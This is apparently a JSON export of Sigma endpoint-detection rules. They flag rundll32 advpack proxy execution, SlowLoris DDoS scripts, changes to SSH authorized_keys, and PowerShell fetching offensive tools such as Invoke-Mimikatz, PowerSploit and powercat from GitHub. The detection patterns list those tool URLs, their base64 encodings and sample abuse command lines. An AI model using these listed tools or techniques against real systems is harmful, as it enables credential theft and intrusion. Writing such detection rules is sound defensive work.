"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d06f9bc2-420e-4291-93be-da3246c0dc81",
"rule_name": "DigiSpark USB Malicious PowerShell Snippets",
"rule_description": "Detects popular default PowerShell snippets deployed by DigiSpark, an alternative to USB hacking tools like RubberDucky or BashBunny.\nThis rule detects snippets from various public repositories associated with DigiSpark. While some actions may not originate from a DigiSpark device, they may still be malicious.\nIt is recommended to investigate the PowerShell script and determine the context in which it was executed. It is also recommended to investigate any USB devices that were plugged into this machine.\n",
"rule_creation_date": "2025-01-06",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1091",
"attack.t1200"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d0cfcf52-bb32-4c4d-a983-0bebd4b842a7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088275Z",
"creation_date": "2026-03-23T11:45:34.088277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Libraries/Advpack/",
"https://attack.mitre.org/techniques/T1218/011/"
],
"name": "t1218_011_rundll32_advpack.yml",
"content": "title: Proxy Execution via Advpack.dll\nid: d0cfcf52-bb32-4c4d-a983-0bebd4b842a7\ndescription: |\n Detects a suspicious invocation of Advpack.dll by rundll32.\n Adversaries may abuse rundll32.exe to proxy execution of malicious code.\n Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor an execution of the rundll32.exe process because of whitelists or false positives from baseline behavior.\n It is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze child processes.\nreferences:\n - https://lolbas-project.github.io/lolbas/Libraries/Advpack/\n - https://attack.mitre.org/techniques/T1218/011/\ndate: 2022/12/02\nmodified: 2025/10/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Advpack\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_advpack:\n CommandLine|contains: ' advpack'\n\n # rundll32.exe advpack.dll,LaunchINFSection c:\\test.inf,,1,\n selection_action_launchinf:\n CommandLine|contains:\n - 'LaunchINFSection'\n - '#8' # LaunchINFSectionA\n - '#9' # LaunchINFSectionEx\n - '#10' # LaunchINFSectionExA\n - '#44' # LaunchINFSection\n - '#45' # LaunchINFSectionExW\n - '#46' # LaunchINFSectionW\n\n # rundll32.exe advpack.dll,RegisterOCX test.dll\n selection_action_registerocx:\n CommandLine|contains:\n - 'RegisterOCX'\n - '#11' # RegisterOCX\n - '#12' # RegisterOCXW\n\n exclusion_programfiles:\n CommandLine|contains:\n - 'rundll32.exe advpack.dll,LaunchINFSection ?:\\Program Files\\'\n - 'rundll32.exe advpack.dll,LaunchINFSection ?:\\Program Files (x86)\\'\n - 'rundll32.exe 
advpack.dll,LaunchINFSectionEx ?:\\Program Files\\'\n - 'rundll32.exe advpack.dll,LaunchINFSectionEx ?:\\Program Files (x86)\\'\n - 'rundll32 advpack.dll,LaunchINFSection ?:\\Program Files\\'\n - 'rundll32 advpack.dll,LaunchINFSection ?:\\Program Files (x86)\\'\n - 'rundll32 advpack.dll,LaunchINFSectionEx ?:\\Program Files\\'\n - 'rundll32 advpack.dll,LaunchINFSectionEx ?:\\Program Files (x86)\\'\n\n exclusion_ieuinit:\n CommandLine|contains: '?:\\Windows\\system32\\ieuinit.inf'\n\n exclusion_immersivecontrolpanel:\n CommandLine|startswith: '?:\\Windows\\System32\\rundll32.exe ADVPACK.DLL,LaunchINFSection '\n ParentImage: '?:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe'\n\n exclusion_windows_media:\n CommandLine|contains: 'rundll32.exe advpack.dll,LaunchINFSection setup.inf,,1,N'\n ParentImage: '?:\\ProgramData\\Package Cache\\\\*\\wm8eutil_setup.exe'\n\n exclusion_hp:\n ParentImage: '?:\\Program Files\\HPCommRecovery\\HPCommRecovery.exe'\n\n condition: selection_bin and selection_advpack and 1 of selection_action_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d0cfcf52-bb32-4c4d-a983-0bebd4b842a7",
"rule_name": "Proxy Execution via Advpack.dll",
"rule_description": "Detects a suspicious invocation of Advpack.dll by rundll32.\nAdversaries may abuse rundll32.exe to proxy execution of malicious code.\nUsing rundll32.exe instead of executing directly (i.e. Shared Modules) may avoid triggering security tools that do not monitor execution of the rundll32.exe process because of whitelists or false positives from baseline behavior.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of rundll32 and to analyze child processes.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-10-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d10ca8a8-d720-4cca-8cbd-e183bb381b37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619635Z",
"creation_date": "2026-03-23T11:45:34.619637Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619641Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/",
"https://github.com/maxkrivich/SlowLoris",
"https://github.com/StanGirard/SlowLoris-DDOS-Attack",
"https://github.com/0xc0d/Slow-Loris",
"https://github.com/GHubgenius/slowloris.pl",
"https://attack.mitre.org/techniques/T1499/002/"
],
"name": "t1498_slowloris_script_execution_macos.yml",
"content": "title: SlowLoris Script Execution (macOS)\nid: d10ca8a8-d720-4cca-8cbd-e183bb381b37\ndescription: |\n Detects suspicious arguments in a command-line linked to the usage of a SlowLoris DDoS script.\n SlowLoris is a type of DDoS attack that allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\n It is recommended to investigate this by checking if the script parameters are aimed at your own infrastructure and that they're not part of an internal test.\nreferences:\n - https://www.cloudflare.com/learning/ddos/ddos-attack-tools/slowloris/\n - https://github.com/maxkrivich/SlowLoris\n - https://github.com/StanGirard/SlowLoris-DDOS-Attack\n - https://github.com/0xc0d/Slow-Loris\n - https://github.com/GHubgenius/slowloris.pl\n - https://attack.mitre.org/techniques/T1499/002/\ndate: 2023/09/19\nmodified: 2025/01/08\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1499.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.HackTool.SlowLoris\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains:\n - 'slowloris.pl'\n - 'slowloris '\n - 'slowloris.py'\n\n # There is another rule for cloning\n filter_github:\n CommandLine|contains:\n - ' clone '\n - 'github'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d10ca8a8-d720-4cca-8cbd-e183bb381b37",
"rule_name": "SlowLoris Script Execution (macOS)",
"rule_description": "Detects suspicious arguments in a command line linked to the usage of a SlowLoris DDoS script.\nSlowLoris is a type of DDoS attack that allows an attacker to overwhelm a server by maintaining multiple HTTP connections.\nIt is recommended to investigate this by checking whether the script parameters are aimed at your own infrastructure and whether they are part of an internal test.\n",
"rule_creation_date": "2023-09-19",
"rule_modified_date": "2025-01-08",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1499.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d12ad52c-e73b-4f36-9f17-cf34a7c5d3c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.741647Z",
"creation_date": "2026-03-23T11:45:34.081367Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081371Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1484/",
"https://attack.mitre.org/techniques/T1098/004/"
],
"name": "t1021_004_ssh_authorized_keys_modified_linux.yml",
"content": "title: SSH Authorized Keys Modified\nid: d12ad52c-e73b-4f36-9f17-cf34a7c5d3c0\ndescription: |\n Detects an attempt to modify the content of ~/.ssh/authorized keys.\n This file contains the list of SSH keys that are allowed to connect to that account.\n Modifying this file can therefore be an attempt to facilitate lateral movement.\n It is recommended to correlate this alert with other initial access or malicious activity in the machine to determine its legitimacy\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1484/\n - https://attack.mitre.org/techniques/T1098/004/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - attack.persistence\n - attack.t1098.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.ConfigChange\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n - TargetPath:\n - '/home/*/.ssh/authorized_keys'\n - '/home/*/.ssh/authorized_keys2'\n - '/root/.ssh/authorized_keys'\n - '/root/.ssh/authorized_keys2'\n\n filter_access_old:\n Kind: 'access'\n Permissions: 'read'\n\n filter_access_new:\n Kind:\n - 'read'\n - 'chmod'\n - 'chown'\n - 'remove'\n\n exclusion_ssh:\n - ProcessImage: '/usr/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n\n exclusion_common:\n ProcessImage:\n - '/usr/sbin/luserdel'\n - '/usr/bin/touch'\n - '/usr/bin/git'\n - '/usr/bin/rsync'\n - '/usr/bin/tar'\n\n exclusion_commandline:\n ProcessCommandLine: '/bin/mv /tmp/file?????? 
/home/u*/.ssh/authorized_keys'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/snap/docker/*/bin/dockerd'\n - ProcessAncestors|contains: '|/usr/bin/dockerd|'\n\n exclusion_podman:\n ProcessImage: '/usr/bin/podman'\n\n exclusion_containers:\n ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/var/lib/rancher/k3s/data/*/bin/containerd-shim-runc-v2|'\n\n exclusion_netwitness_logcollector:\n - ProcessCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n - ProcessParentCommandLine: '/bin/bash /etc/netwitness/ng/logcollector/lctwin'\n\n exclusion_puppet:\n - ProcessImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_google:\n ProcessImage: '/usr/bin/google_guest_agent'\n\n exclusion_opcon:\n - ProcessCommandLine: '/bin/sh /tmp/opcon_agent/bin/install_key /tmp/opcon_agent/bin/sma_id_rsa.pub'\n - ProcessParentCommandLine: '/bin/sh /tmp/opcon_agent/bin/install_key /tmp/opcon_agent/bin/sma_id_rsa.pub'\n\n exclusion_salt_minion:\n - ProcessCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessParentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? /usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n - ProcessGrandparentCommandLine:\n - '/opt/saltstack/salt/bin/python3.?? 
/usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_rudder:\n - ProcessCommandLine:\n - '/bin/sh /opt/rudder/share/commands/agent-run -urn'\n - '/opt/rudder/bin/cf-agent -i -d info -cnever -k'\n - ProcessParentCommandLine:\n - '/bin/sh /opt/rudder/share/commands/agent-run -urn'\n - '/opt/rudder/bin/cf-agent -i -d info -cnever -k'\n\n exclusion_buildah:\n ProcessParentCommandLine: 'buildah-oci-runtime'\n ProcessGrandparentCommandLine: 'buildah-oci-runtime'\n\n exclusion_docker_chown:\n ProcessCommandLine: 'chown docker:docker /home/docker/.ssh/authorized_keys'\n\n exclusion_legitimate_sshd_check:\n ProcessCommandLine|startswith: 'sh -c cd ; umask 077 ; mkdir -p .ssh && { [ -z `tail -1c .ssh/authorized_keys 2>/dev/null` ] || echo >> .ssh/authorized_keys || exit 1; } && cat >> .ssh/authorized_keys || exit 1 ;'\n ProcessGrandparentImage: '/usr/sbin/sshd'\n\n exclusion_openwrt:\n ProcessCommandLine|startswith: 'sh -c cd; umask 077; AUTH_KEY_FILE=\".ssh/authorized_keys\"; [ -f /etc/openwrt_release ] && [ \"$LOGNAME\" = \"root\" ] && AUTH_KEY_FILE=/etc/dropbear/authorized_keys; AUTH_KEY_DIR=`dirname \"${AUTH_KEY_FILE}\"`;'\n ProcessGrandparentImage: '/usr/sbin/sshd'\n\n exclusion_rename:\n Kind: 'rename'\n ProcessImage:\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n - '/usr/bin/vim.basic'\n - '/usr/bin/emacs-gtk'\n TargetPath: '/*/.ssh/authorized_keys~'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path: '/*/.ssh/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath: '/*/.ssh/sed??????'\n\n exclusion_cron:\n ProcessAncestors|contains: '|/usr/sbin/incrond|'\n\n exclusion_octelium:\n ProcessImage: '/usr/local/bin/octelium'\n ProcessCommandLine|contains: 'octelium connect -p '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "d12ad52c-e73b-4f36-9f17-cf34a7c5d3c0",
"rule_name": "SSH Authorized Keys Modified",
"rule_description": "Detects an attempt to modify the content of ~/.ssh/authorized_keys.\nThis file contains the list of SSH keys that are allowed to connect to that account.\nModifying this file can therefore be an attempt to facilitate lateral movement.\nIt is recommended to correlate this alert with other initial access or malicious activity on the machine to determine its legitimacy.\n",
"rule_creation_date": "2022-11-07",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.lateral_movement",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1021.004",
"attack.t1098.004",
"attack.t1484"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "d242d0d4-fb07-43c1-8f33-f08f9c952b6f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091817Z",
"creation_date": "2026-03-23T11:45:34.091819Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091823Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_urls_cmd.yml",
"content": "title: URLs of Malicious Code Repository in PowerShell Command-line\nid: d242d0d4-fb07-43c1-8f33-f08f9c952b6f\ndescription: |\n Detects PowerShell commandlets containing a URL that references repositories used to host malicious code or offensive tooling.\n Threat actors frequently use public repositories and open-source PowerShell scripts in their attacks.\n It is recommended to investigate the repository being accessed, and examine any files or data that may have been downloaded. If your organization is not undergoing a security audit, this could indicate the initial stages of an attack.\nreferences:\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2020/12/08\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.NetworkActivity\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_github:\n CommandLine|contains:\n - '/raw.githubusercontent.com/'\n - 'LwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - '8AcgBhAHcALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n - 'vAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '/gist.githubusercontent.com/'\n - 'LwBnAGkAcwB0AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALw'\n - '8AZwBpAHMAdAAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8A'\n - 'vAGcAaQBzAHQALgBnAGkAdABoAHUAYgB1AHMAZQByAGMAbwBuAHQAZQBuAHQALgBjAG8AbQAvA'\n\n selection_repo:\n CommandLine|contains:\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/PowershellScripts/Find-Fruit.ps1\n # https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1\n - '/S3cur3Th1sSh1t/'\n # 
/S3cur3Th1sSh1t/ in UTF16-LE in base64 with 3 different offsets, for PowerShell command-lines\n - 'LwBTADMAYwB1AHIAMwBUAGgAMQBzAFMAaAAxAHQALw'\n - '8AUwAzAGMAdQByADMAVABoADEAcwBTAGgAMQB0AC8A'\n - 'vAFMAMwBjAHUAcgAzAFQAaAAxAHMAUwBoADEAdAAvA'\n # 'https://raw.githubusercontent.com/pwnieexpress/Metasploit-framework/master/exploits/powershell/powerdump.ps1\n - '/pwnieexpress/'\n - 'LwBwAHcAbgBpAGUAZQB4AHAAcgBlAHMAcwAvA'\n - '8AcAB3AG4AaQBlAGUAeABwAHIAZQBzAHMALw'\n - 'vAHAAdwBuAGkAZQBlAHgAcAByAGUAcwBzAC8A'\n # https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1\n - '/EmpireProject/'\n - 'LwBFAG0AcABpAHIAZQBQAHIAbwBqAGUAYwB0AC8A'\n - '8ARQBtAHAAaQByAGUAUAByAG8AagBlAGMAdAAvA'\n - 'vAEUAbQBwAGkAcgBlAFAAcgBvAGoAZQBjAHQALw'\n # https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1\n - '/PowerSploit/'\n - 'LwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALw'\n - '8AUABvAHcAZQByAFMAcABsAG8AaQB0AC8A'\n - 'vAFAAbwB3AGUAcgBTAHAAbABvAGkAdAAvA'\n # https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1\n - '/clymb3r/'\n - 'LwBjAGwAeQBtAGIAMwByAC8A'\n - '8AYwBsAHkAbQBiADMAcgAvA'\n - 'vAGMAbAB5AG0AYgAzAHIALw'\n - '/Invoke-Mimikatz/'\n - 'LwBJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAvA'\n - '8ASQBuAHYAbwBrAGUALQBNAGkAbQBpAGsAYQB0AHoALw'\n - 'vAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC8A'\n # https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1\n - '/BloodHoundAD/'\n - 'LwBCAGwAbwBvAGQASABvAHUAbgBkAEEARAAvA'\n - '8AQgBsAG8AbwBkAEgAbwB1AG4AZABBAEQALw'\n - 'vAEIAbABvAG8AZABIAG8AdQBuAGQAQQBEAC8A'\n # https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1\n - '/Kevin-Robertson/'\n - 'LwBLAGUAdgBpAG4ALQBSAG8AYgBlAHIAdABzAG8AbgAvA'\n - '8ASwBlAHYAaQBuAC0AUgBvAGIAZQByAHQAcwBvAG4ALw'\n - 'vAEsAZQB2AGkAbgAtAFIAbwBiAGUAcgB0AHMAbwBuAC8A'\n # 
https://raw.githubusercontent.com/Veil-Framework/Veil-Pillage/master/data/PowerSploit/Invoke-Mimikatz.ps1\n - '/Veil-Framework/'\n - 'LwBWAGUAaQBsAC0ARgByAGEAbQBlAHcAbwByAGsALw'\n - '8AVgBlAGkAbAAtAEYAcgBhAG0AZQB3AG8AcgBrAC8A'\n - 'vAFYAZQBpAGwALQBGAHIAYQBtAGUAdwBvAHIAawAvA'\n # https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/Get-SPN/Get-SPN.psm1\n - '/nullbind/Powershellery/'\n - 'LwBuAHUAbABsAGIAaQBuAGQALwBQAG8AdwBlAHIAcwBoAGUAbABsAGUAcgB5AC8A'\n - '8AbgB1AGwAbABiAGkAbgBkAC8AUABvAHcAZQByAHMAaABlAGwAbABlAHIAeQAvA'\n - 'vAG4AdQBsAGwAYgBpAG4AZAAvAFAAbwB3AGUAcgBzAGgAZQBsAGwAZQByAHkALw'\n # https://gist.githubusercontent.com/shantanu561993/6483e524dc225a188de04465c8512909/raw/db219421ea911b820e9a484754f03a26fbfb9c27/AMSI_bypass_Reflection.ps1\n - '/shantanu561993/'\n - 'LwBzAGgAYQBuAHQAYQBuAHUANQA2ADEAOQA5ADMALw'\n - '8AcwBoAGEAbgB0AGEAbgB1ADUANgAxADkAOQAzAC8A'\n - 'vAHMAaABhAG4AdABhAG4AdQA1ADYAMQA5ADkAMwAvA'\n # https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\n - '/powercat/'\n - 'LwBwAG8AdwBlAHIAYwBhAHQALw'\n - '8AcABvAHcAZQByAGMAYQB0AC8A'\n - 'vAHAAbwB3AGUAcgBjAGEAdAAvA'\n # https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - '/FuzzySecurity/PowerShell-Suite/'\n - 'LwBGAHUAegB6AHkAUwBlAGMAdQByAGkAdAB5AC8AUABvAHcAZQByAFMAaABlAGwAbAAtAFMAdQBpAHQAZQAvA'\n - '8ARgB1AHoAegB5AFMAZQBjAHUAcgBpAHQAeQAvAFAAbwB3AGUAcgBTAGgAZQBsAGwALQBTAHUAaQB0AGUALw'\n - 'vAEYAdQB6AHoAeQBTAGUAYwB1AHIAaQB0AHkALwBQAG8AdwBlAHIAUwBoAGUAbABsAC0AUwB1AGkAdABlAC8A'\n # https://raw.githubusercontent.com/The-Viper-One/PsMapExec/main/PsMapExec.ps1\n - '/The-Viper-One/'\n - 'LwBUAGgAZQAtAFYAaQBwAGUAcgAtAE8AbgBlAC8A'\n - '8AVABoAGUALQBWAGkAcABlAHIALQBPAG4AZQAvA'\n - 'vAFQAaABlAC0AVgBpAHAAZQByAC0ATwBuAGUALw'\n # https://raw.githubusercontent.com/leoloobeek/LAPSToolkit/refs/heads/master/LAPSToolkit.ps1\n - '/leoloobeek/'\n - 'LwBsAGUAbwBsAG8AbwBiAGUAZQBrAC8A'\n - '8AbABlAG8AbABvAG8AYgBlAGUAawAvA'\n - 
'vAGwAZQBvAGwAbwBvAGIAZQBlAGsALw'\n # https://raw.githubusercontent.com/sense-of-security/ADRecon/refs/heads/master/ADRecon.ps1\n - '/sense-of-security/'\n - 'LwBzAGUAbgBzAGUALQBvAGYALQBzAGUAYwB1AHIAaQB0AHkALw'\n - '8AcwBlAG4AcwBlAC0AbwBmAC0AcwBlAGMAdQByAGkAdAB5AC8A'\n - 'vAHMAZQBuAHMAZQAtAG8AZgAtAHMAZQBjAHUAcgBpAHQAeQAvA'\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-ADM.ps1\n # https://github.com/Friends-Security/ShadowHound/raw/refs/heads/main/ShadowHound-DS.ps1\n - '/Friends-Security/'\n - 'LwBGAHIAaQBlAG4AZABzAC0AUwBlAGMAdQByAGkAdAB5AC8A'\n - '8ARgByAGkAZQBuAGQAcwAtAFMAZQBjAHUAcgBpAHQAeQAvA'\n - 'vAEYAcgBpAGUAbgBkAHMALQBTAGUAYwB1AHIAaQB0AHkALw'\n # https://github.com/dafthack/GraphRunner\n # https://github.com/dafthack/MFASweep\n # https://github.com/dafthack/MailSniper\n - '/dafthack/'\n - 